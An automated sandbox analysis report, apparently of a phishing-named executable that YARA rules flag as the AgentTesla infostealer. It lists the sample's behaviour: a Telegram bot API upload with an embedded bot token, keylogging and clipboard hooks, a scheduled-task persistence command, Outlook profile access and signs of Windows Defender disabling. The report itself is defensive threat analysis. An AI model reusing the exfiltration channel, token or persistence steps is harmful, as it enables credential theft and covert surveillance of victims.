HTTP traffic detected: POST /bot5962712783:AAFVWYP7zptQlynX_9COtuxYcx3Dl7EnfUQ/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dad9d3fba18902Host: api.telegram.orgContent-Length: 1079Expect: 100-continueConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: api.ipify.org

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 3.232.242.170:443 -> 192.168.2.4:49695 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49696 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.91.59.199:443 -> 192.168.2.4:49697 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49698 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe			Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\WsdnBq.exe

Contains functionality to register a low level keyboard hook

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe

Code function: 4_2_06CA3790 SetWindowsHookExW 0000000D,00000000,?,?

4_2_06CA3790

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Window created: window name: CLIPBRDWNDCLASS

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 4.0.ORDER (6256 OS)#391 PI.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 4.0.ORDER (6256 OS)#391 PI.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 5.2.WsdnBq.exe.2e72288.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 0.2.ORDER (6256 OS)#391 PI.exe.30f22b8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 00000004.00000000.334155357.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000000.00000002.343033622.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1688, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1948, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: ORDER (6256 OS)#391 PI.exe

.NET source code contains very large array initializations

Source: 4.0.ORDER (6256 OS)#391 PI.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bFD9F610Eu002d7B51u002d480Du002dB05Au002dE55A047CA86Au007d/u003991DE117u002d9CB5u002d4593u002dADFDu002d17D5BF3CC903.cs

Large array initialization: .cctor: array initializer size 9257

Source: ORDER (6256 OS)#391 PI.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 4.0.ORDER (6256 OS)#391 PI.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.0.ORDER (6256 OS)#391 PI.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 0.2.ORDER (6256 OS)#391 PI.exe.40a16e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 5.2.WsdnBq.exe.2e72288.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 0.2.ORDER (6256 OS)#391 PI.exe.30f22b8.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 00000004.00000000.334155357.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000000.00000002.343033622.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1688, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1948, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_0160E87F	0_2_0160E87F
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_0160E880	0_2_0160E880
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_0160BFF4	0_2_0160BFF4
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_07986698	0_2_07986698
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_0798A290	0_2_0798A290
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_0798ACC0	0_2_0798ACC0
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_079815E0	0_2_079815E0
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_07985958	0_2_07985958
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_0798F880	0_2_0798F880
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_07982348	0_2_07982348
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_0798ED18	0_2_0798ED18
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_0798E880	0_2_0798E880
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_0798F7ED	0_2_0798F7ED
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_07991799	0_2_07991799
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_0799B710	0_2_0799B710
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_07993F50	0_2_07993F50
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_07998678	0_2_07998678
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_0799CD48	0_2_0799CD48
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_07998BB0	0_2_07998BB0
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_07990A08	0_2_07990A08
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_07990040	0_2_07990040
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_07993F40	0_2_07993F40
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_079926F0	0_2_079926F0
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_079926E2	0_2_079926E2
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_07997E1E	0_2_07997E1E
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_07998669	0_2_07998669
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_07993528	0_2_07993528
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_07993D58	0_2_07993D58
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_07997D50	0_2_07997D50
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_07993D48	0_2_07993D48
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_07994A80	0_2_07994A80
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_07993AB9	0_2_07993AB9
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_0799A2B7	0_2_0799A2B7
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_07993AC8	0_2_07993AC8
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_0799A2C8	0_2_0799A2C8
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_07993250	0_2_07993250
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_07993242	0_2_07993242
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_07994A69	0_2_07994A69
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_079909F8	0_2_079909F8
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_079938B0	0_2_079938B0
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_079938C0	0_2_079938C0
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_07990006	0_2_07990006
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_0799003A	0_2_0799003A
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_07999050	0_2_07999050
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_07999043	0_2_07999043
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_0F2E0DD3	0_2_0F2E0DD3
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 4_2_0120F5D8	4_2_0120F5D8
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 4_2_01206680	4_2_01206680
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 4_2_0120F920	4_2_0120F920
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 4_2_06CAD0B8	4_2_06CAD0B8
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 4_2_06CADA04	4_2_06CADA04
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 4_2_06CAA0FC	4_2_06CAA0FC
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Code function: 5_2_02C0E880	5_2_02C0E880
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Code function: 5_2_02C0E870	5_2_02C0E870
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Code function: 5_2_02C0BFF4	5_2_02C0BFF4

Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.353975152.0000000008FF0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMajorRevision.exe< vs ORDER (6256 OS)#391 PI.exe
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.338224910.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCassa.dll< vs ORDER (6256 OS)#391 PI.exe
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.338224910.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameee5480e3-6672-4c3d-b2bc-dbb41213b835.exe4 vs ORDER (6256 OS)#391 PI.exe
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000000.294120479.0000000000BF8000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameRycGBA2.exe< vs ORDER (6256 OS)#391 PI.exe
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.344873372.00000000041F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMajorRevision.exe< vs ORDER (6256 OS)#391 PI.exe
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.344873372.00000000041F6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRycGBA2.exe< vs ORDER (6256 OS)#391 PI.exe
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.343033622.0000000003FC9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameee5480e3-6672-4c3d-b2bc-dbb41213b835.exe4 vs ORDER (6256 OS)#391 PI.exe
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.339949264.0000000003165000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMajorRevision.exe< vs ORDER (6256 OS)#391 PI.exe
Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000002.561914622.0000000000CF8000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs ORDER (6256 OS)#391 PI.exe
Source: ORDER (6256 OS)#391 PI.exe, 00000004.00000000.334273963.000000000042A000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameee5480e3-6672-4c3d-b2bc-dbb41213b835.exe4 vs ORDER (6256 OS)#391 PI.exe
Source: ORDER (6256 OS)#391 PI.exe	Binary or memory string: OriginalFilenameRycGBA2.exe< vs ORDER (6256 OS)#391 PI.exe

Source: ORDER (6256 OS)#391 PI.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: WsdnBq.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: ORDER (6256 OS)#391 PI.exe

ReversingLabs: Detection: 30%

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe

File read: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe

Jump to behavior

Source: ORDER (6256 OS)#391 PI.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmpF47D.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process created: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe {path}
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process created: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe {path}
Source: unknown	Process created: C:\Users\user\AppData\Roaming\WsdnBq.exe C:\Users\user\AppData\Roaming\WsdnBq.exe
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmp645E.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process created: C:\Users\user\AppData\Roaming\WsdnBq.exe {path}
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmpF47D.tmp	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process created: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe {path}	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Process created: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe {path}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WsdnBq" /XML "C:\Users\user\AppData\Local\Temp\tmp645E.tmp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Process created: C:\Users\user\AppData\Roaming\WsdnBq.exe {path}	Jump to behavior

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe

File created: C:\Users\user\AppData\Roaming\WsdnBq.exe

Jump to behavior

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe

File created: C:\Users\user\AppData\Local\Temp\tmpF47D.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@14/5@6/4

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: ORDER (6256 OS)#391 PI.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2236:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1496:120:WilError_01
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	Mutant created: \Sessions\1\BaseNamedObjects\pwiUZWOdBetP

Source: 4.0.ORDER (6256 OS)#391 PI.exe.400000.0.unpack, A/e2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 4.0.ORDER (6256 OS)#391 PI.exe.400000.0.unpack, A/e2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: ORDER (6256 OS)#391 PI.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: ORDER (6256 OS)#391 PI.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: ORDER (6256 OS)#391 PI.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: RycGBA2.pdb source: ORDER (6256 OS)#391 PI.exe, WsdnBq.exe.0.dr
Source:	Binary string: RycGBA2.pdbSHA256 source: ORDER (6256 OS)#391 PI.exe, WsdnBq.exe.0.dr

Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_0798F663 push ecx; iretd	0_2_0798F66D
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 0_2_07996226 push ss; iretd	0_2_07996227
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 4_2_06CA14C8 push eax; iretd	4_2_06CA15D9
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 4_2_06CA0EBD push es; retf	4_2_06CA0EC0
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 4_2_06CAAD5E push es; ret	4_2_06CAAD60
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 4_2_06CA092D push 8B000005h; retf	4_2_06CA0937
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 4_2_06CA144F push es; ret	4_2_06CA1480
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 4_2_06CA1441 push cs; retf 0006h	4_2_06CA1442
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 4_2_06CA141D push cs; retf 0006h	4_2_06CA141E
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 4_2_06CA1413 push es; iretd	4_2_06CA1414
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 4_2_06CA1429 push cs; retf 0006h	4_2_06CA142A
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 4_2_06CA142D push cs; retf 0006h	4_2_06CA142E
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 4_2_06CA1421 push cs; retf 0006h	4_2_06CA1422
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe	Code function: 4_2_06CA1425 push cs; retf 0006h	4_2_06CA1426
